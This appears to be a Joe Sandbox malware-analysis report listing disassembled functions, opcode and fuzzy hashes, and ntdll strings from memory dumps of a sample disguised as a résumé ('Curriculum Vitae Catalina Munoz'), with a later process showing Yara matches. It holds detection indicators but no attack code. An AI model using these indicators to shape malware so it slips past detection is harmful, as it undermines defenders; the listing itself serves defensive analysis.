                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42e8259112639c0ceca7564e37f5fc3b80f3cc0820110570d27c913ffc48bcf9
                                    • Instruction ID: abbacc20dcf31e9b3b2f64234ccfb1942c21949da74efd9392fb3176796e70a2
                                    • Opcode Fuzzy Hash: 42e8259112639c0ceca7564e37f5fc3b80f3cc0820110570d27c913ffc48bcf9
                                    • Instruction Fuzzy Hash: 2190023120140403D10075D954086460055A7E0315F59D411A5024955EC6F589916231
                                    Function 01532F60 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d4e6aad309a5ac086b03932ef63108958a29da92626a811f35e9589f37824bf9
                                    • Instruction ID: d735d3cdf7dceb1d8294d77148d1b958f1c40934957b6554e43a44b0b8ab9063
                                    • Opcode Fuzzy Hash: d4e6aad309a5ac086b03932ef63108958a29da92626a811f35e9589f37824bf9
                                    • Instruction Fuzzy Hash: 9290027121140043D104719944047060095A7E1215F59C412A2154954CC5B98D615225
                                    Function 01532F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad685b3fe7b8c576d276ec1ec1ac2625227382d8f9eb3ab67781d67ec4af613d
                                    • Instruction ID: 78782f19788c3f7e1000eed18759255f83b6f7039a562fdd364a2ba80f6ac7b5
                                    • Opcode Fuzzy Hash: ad685b3fe7b8c576d276ec1ec1ac2625227382d8f9eb3ab67781d67ec4af613d
                                    • Instruction Fuzzy Hash: 1090027134140443D10071994414B060055E7E1315F59C415E1064954DC6A9CD526226
                                    Function 01532FE0 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b5b61f214211ada3021add0d96b104cf90938496e3db17d4d215bd6e0b11c212
                                    • Instruction ID: 9adfd2a064f5297968a69068b3a80f132995e9c106242f57530e26f4b68453f7
                                    • Opcode Fuzzy Hash: b5b61f214211ada3021add0d96b104cf90938496e3db17d4d215bd6e0b11c212
                                    • Instruction Fuzzy Hash: 94900231211C0043D20075A94C14B070055A7D0317F59C515A0154954CC9A589615621
                                    Function 01532F90 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 18be315293e0a1dd8456481df8cdf3588238bb87de599fdc2d90e921407ef1a5
                                    • Instruction ID: eb9de47e0962d3a14a74c55627b883d7e9013a7abb7890f94a69efbf85303ff8
                                    • Opcode Fuzzy Hash: 18be315293e0a1dd8456481df8cdf3588238bb87de599fdc2d90e921407ef1a5
                                    • Instruction Fuzzy Hash: E590023120180403D1007199481470B0055A7D0316F59C411A1164955DC6B589516671
                                    Function 01532FB0 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1a9451ef42e1ef4dad938c9c1abfd544d27ec15acb106dde997aa26a94c8d99a
                                    • Instruction ID: a279209b424742edd0cee0e85f44e9b6ea27438bde956b443f3a3c2030263e0f
                                    • Opcode Fuzzy Hash: 1a9451ef42e1ef4dad938c9c1abfd544d27ec15acb106dde997aa26a94c8d99a
                                    • Instruction Fuzzy Hash: 9090023160140043414071A988449064055BBE1225759C521A0998950DC5E989655765
                                    Function 01532FA0 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1ed03b5386589dcbf1176c2a0f5f95467f788f1ac29a029209509909b804678
                                    • Instruction ID: 5a4c67210972dbc836dedc3a37680cc28150c4adab42d8af3d141ba847c901c4
                                    • Opcode Fuzzy Hash: e1ed03b5386589dcbf1176c2a0f5f95467f788f1ac29a029209509909b804678
                                    • Instruction Fuzzy Hash: C290023120180403D100719948087470055A7D0316F59C411A5164955EC6F5C9916631
                                    Function 01532E30 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 24ae8e01d709012f46d8fb035210a848a34f0badd6fee77263d89fd160c5b8d0
                                    • Instruction ID: 8d94845bbcc97e0b125d782bc69cc32a427e89d7b3416d57ded7426f1e6ce8c6
                                    • Opcode Fuzzy Hash: 24ae8e01d709012f46d8fb035210a848a34f0badd6fee77263d89fd160c5b8d0
                                    • Instruction Fuzzy Hash: 4790023130140403D102719944146060059E7D1359F99C412E1424955DC6B58A53A232
                                    Function 01532EE0 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2390413be828fbab6ea01272b3cf157719223b019192137d87e82dc79292c31e
                                    • Instruction ID: b73b4b48b427aa1d7af0b3639e826cb926349d654e64a3a6f27f7f8d5d53be1b
                                    • Opcode Fuzzy Hash: 2390413be828fbab6ea01272b3cf157719223b019192137d87e82dc79292c31e
                                    • Instruction Fuzzy Hash: 1390027120180403D140759948046070055A7D0316F59C411A2064955ECAB98D516235
                                    Function 01532E80 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1b6231a22f835a49eb893427d98838ed7c8df845972175744e63479325e270e
                                    • Instruction ID: a844e6f76e7ebaef0266ec345ef665db80f016217284d01852bc1adf11dd466e
                                    • Opcode Fuzzy Hash: e1b6231a22f835a49eb893427d98838ed7c8df845972175744e63479325e270e
                                    • Instruction Fuzzy Hash: D890023160140503D10171994404616005AA7D0255F99C422A1024955ECAB58A92A231
                                    Function 01532EA0 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ee65da0206efe2c17017db66ff633b9e674e690819898d0f6c9c31d8e6c0b89
                                    • Instruction ID: 39f8054a37a0d0cbd5c30ba128a0e6e1febf8d840cb2866dc412f1602f485457
                                    • Opcode Fuzzy Hash: 0ee65da0206efe2c17017db66ff633b9e674e690819898d0f6c9c31d8e6c0b89
                                    • Instruction Fuzzy Hash: DF90027120140403D140719944047460055A7D0315F59C411A5064954EC6E98ED56765
                                    Function 01533010 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a56c6f77623d0d786d7c89ae71fe9c337596938bed93e39745b40db6057a101c
                                    • Instruction ID: a5a8c70b0648bb29f16fe96433c8cceb52d048790cf040456199e88bebcaba26
                                    • Opcode Fuzzy Hash: a56c6f77623d0d786d7c89ae71fe9c337596938bed93e39745b40db6057a101c
                                    • Instruction Fuzzy Hash: 4090023120184443D14072994804B0F4155A7E1216F99C419A4156954CC9A589555721
                                    Function 01533090 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: def71577a9a796f5e704b0fc71daaa7f8cf9f7db415c873377f11cdaedb063dd
                                    • Instruction ID: fabc9740abc6306d8f5bb85000e0da2a517ca0b0860eb6da8376f3e319dac27b
                                    • Opcode Fuzzy Hash: def71577a9a796f5e704b0fc71daaa7f8cf9f7db415c873377f11cdaedb063dd
                                    • Instruction Fuzzy Hash: 0390023124140803D140719984147070056E7D0615F59C411A0024954DC6A68A6567B1
                                    Function 015339B0 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de7a5e78bfa21230af46a35be8b69a04ef0d7745ae44c45e2deabda97c0243db
                                    • Instruction ID: 1852ba46daa2c592589427e5c3560535dc3741588a292bc909068ee402c94b27
                                    • Opcode Fuzzy Hash: de7a5e78bfa21230af46a35be8b69a04ef0d7745ae44c45e2deabda97c0243db
                                    • Instruction Fuzzy Hash: 4D90023124545103D150719D44046164055B7E0215F59C421A0814994DC5E589556321
                                    Function 01533D70 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 14d70ac106244f4777f2a590a2704a9d33789278be9838909c4653ca7c10b140
                                    • Instruction ID: b990b11291b6e58753f160f9ba4b503356e0dab5d48422f4de7f3523ce7f2d30
                                    • Opcode Fuzzy Hash: 14d70ac106244f4777f2a590a2704a9d33789278be9838909c4653ca7c10b140
                                    • Instruction Fuzzy Hash: B390023520140403D510719958046460096A7D0315F59D811A0424958DC6E489A1A221
                                    Function 01533D10 Relevance: .0, Instructions: 4COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 071130b5fdc322a12d8d56f0eac45a1f3dc3d5ddb1335c1be739843f488fe58b
                                    • Instruction ID: 0ab6ce557ed1453729764cdfce5cd61724e403f11a52b0a856b47fffc5983293
                                    • Opcode Fuzzy Hash: 071130b5fdc322a12d8d56f0eac45a1f3dc3d5ddb1335c1be739843f488fe58b
                                    • Instruction Fuzzy Hash: 1990023120240143954072995804A4E4155A7E1316B99D815A0015954CC9A489615321
                                    Function 01532C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                    • Instruction ID: 6a8899b29ee5945409ade4dda7fed24e4f90c2e931537a97f86fb5cb3b045d57
                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                    • Instruction Fuzzy Hash:
                                    Function 01532890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                    • Instruction ID: 5fdbe60b8d417ca86b0fccf43c60983931be86f4663a9bf4e3a2edd525087bfd
                                    • Opcode Fuzzy Hash: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                    • Instruction Fuzzy Hash: 2A51E5B6A00616AFCB11DF9C889097EFBF8BB98240B508569F569DB641D334DE418BE0
                                    Function 015A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: 73dd3479c3f0207fe9404a57fc46fd14a8a562ab441d59f757bc4be1a72dc270
                                    • Instruction ID: 78a420a5db316f060567d74eae7e37aa4e0756bd4339a56cbcff012d02865ef5
                                    • Opcode Fuzzy Hash: 73dd3479c3f0207fe9404a57fc46fd14a8a562ab441d59f757bc4be1a72dc270
                                    • Instruction Fuzzy Hash: 51512971A40646AFCB31DF5DC8919BFBBF9FB48200F94885AE5D6CF641E674DA008760
                                    Function 01527630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                    Download Yara Rule
                                    Strings
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01564655
                                    • Execute=1, xrefs: 01564713
                                    • ExecuteOptions, xrefs: 015646A0
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01564787
                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015646FC
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01564742
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01564725
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 0-484625025
                                    • Opcode ID: 081ee6a1e8262c0a0f32743689982836778e6eb1552820777a803a6abf442d1c
                                    • Instruction ID: 1c022cb7002c1238746ff6a758b27bb976a38466968e7f7ddb289d935ab70dde
                                    • Opcode Fuzzy Hash: 081ee6a1e8262c0a0f32743689982836778e6eb1552820777a803a6abf442d1c
                                    • Instruction Fuzzy Hash: 26512A3260022A7BEF21EAA8DC99FAD77A8BF6D700F14009DD605AF1D1D770AA458F50
                                    Function 015C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                    • Instruction ID: ceb7cd24ab41600826f9419dd34391e92bf5a845dce176ce1c4c434b3ef7a3d0
                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                    • Instruction Fuzzy Hash: 0A020471508342AFD305CF68C890A6FBBE5FFD8B04F04892DBA954B264DB31EA45CB52
                                    Function 0153B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-$0$0
                                    • API String ID: 1302938615-699404926
                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                    • Instruction ID: 05b699b5cb076ce6c445900c4e8029fe034abe329a64f97bb295f365f99cefd3
                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                    • Instruction Fuzzy Hash: CB819270E052499EEF268E6CC8517FEBBB1FFC5320F18465AD851AF292C7349941CB51
                                    Function 015A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$[$]:%u
                                    • API String ID: 48624451-2819853543
                                    • Opcode ID: 4357a65855549df2e8a7e012eb8ed47f57717bf4502ebea295dec351bafa1fe4
                                    • Instruction ID: 2d5e899af9ad49df5928a2f85ae21de12377ff13635c06f2915a8933bf41c518
                                    • Opcode Fuzzy Hash: 4357a65855549df2e8a7e012eb8ed47f57717bf4502ebea295dec351bafa1fe4
                                    • Instruction Fuzzy Hash: 1121777AE0011AABDB11DF79DC41AFEBBF8FF94644F440116EA45DB240E730E9018BA1
                                    Function 0151F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                    Download Yara Rule
                                    Strings
                                    • RTL: Re-Waiting, xrefs: 0156031E
                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015602E7
                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015602BD
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                    • API String ID: 0-2474120054
                                    • Opcode ID: 0f88172dd22b62deb2513a4d2e04862f568681756da955261790d0c5c9575d6f
                                    • Instruction ID: b3ebeed1ca959e17182d55fe4536d9b9309d6260f2e0cc5494d1f8ae4a3f67cf
                                    • Opcode Fuzzy Hash: 0f88172dd22b62deb2513a4d2e04862f568681756da955261790d0c5c9575d6f
                                    • Instruction Fuzzy Hash: 33E19E706047429FE726CF28C884B2ABBE4BF84314F140A5EF5A58F2E1D774D949CB92
                                    Function 0152BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                    Download Yara Rule
                                    Strings
                                    • RTL: Re-Waiting, xrefs: 01567BAC
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01567B7F
                                    • RTL: Resource at %p, xrefs: 01567B8E
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 0-871070163
                                    • Opcode ID: b53a446e6b59e9b57feed54e1e64c216dfd000bbe5b63570f8e4701c0f37e689
                                    • Instruction ID: d1d1107dd7bd9dcab591447dc8de0f572799333bc683d4c098f051d131e2b7cf
                                    • Opcode Fuzzy Hash: b53a446e6b59e9b57feed54e1e64c216dfd000bbe5b63570f8e4701c0f37e689
                                    • Instruction Fuzzy Hash: 1741D1367007039FD724DE29C840F6AB7E5FB99710F100A1DE9669F290EB71E4058B91
                                    Function 0152B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0156728C
                                    Strings
                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01567294
                                    • RTL: Re-Waiting, xrefs: 015672C1
                                    • RTL: Resource at %p, xrefs: 015672A3
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-605551621
                                    • Opcode ID: 53067f286c49fb6617f23d154c8e53575ded8ad05be73cf4ab0ca45317843eae
                                    • Instruction ID: 074bfb9df4aa7637b72d0769a334e396daa5e814e4c9006e95cbbf50b196546d
                                    • Opcode Fuzzy Hash: 53067f286c49fb6617f23d154c8e53575ded8ad05be73cf4ab0ca45317843eae
                                    • Instruction Fuzzy Hash: 6A41C132700217ABD721DE29CC41F6AB7A5FB99714F100A19F955AF280DB31F8428BD1
                                    Function 015A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$]:%u
                                    • API String ID: 48624451-3050659472
                                    • Opcode ID: 5af7d5680f36da9e87cf0743bd3bd80ee7924a6269954a5dc6a3cd3ebe8e7af7
                                    • Instruction ID: 4a7ed75a7cdd35dd2ffded56e4a0954b7a30b9ac73913458655ced0f9e91f28f
                                    • Opcode Fuzzy Hash: 5af7d5680f36da9e87cf0743bd3bd80ee7924a6269954a5dc6a3cd3ebe8e7af7
                                    • Instruction Fuzzy Hash: 74316672A002199FDB20DE2DDC41BEE77F8FF55610F94455AE949EB240EB309A448BA0
                                    Function 01537D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-
                                    • API String ID: 1302938615-2137968064
                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                    • Instruction ID: 4d9628ccd1bf3f328409f9746c72f199db57eec9af04827c40cdf78f3cc01709
                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                    • Instruction Fuzzy Hash: E29185B1E002169FDB24DF6DC8816BEBBA5BFC8720F14461AE965EF2C0D73099409761
                                    Function 014F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $$@
                                    • API String ID: 0-1194432280
                                    • Opcode ID: e8396b40327642887e4e751947376ca685368fb6f601422bc3f4b9683a233792
                                    • Instruction ID: 31cef651dcab294f4f76408af6cce367ae088f75dffa02c2d8805af70623655a
                                    • Opcode Fuzzy Hash: e8396b40327642887e4e751947376ca685368fb6f601422bc3f4b9683a233792
                                    • Instruction Fuzzy Hash: AC810A71D0026ADBDB358B54CD44BEEB7B4BB48754F0441EBAA19BB290D7709E84CFA0

                                    Executed Functions

                                    Function 04BA592C Relevance: .1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c506c07a7fb7a7a5ab1f9fc5346c668fe839d99c65d23dcb370c02087194abf8
                                    • Instruction ID: 7ccac05b85f72a21269a18eac3fa6b395d78dc06aa2fe57b3152de33ad9a5648
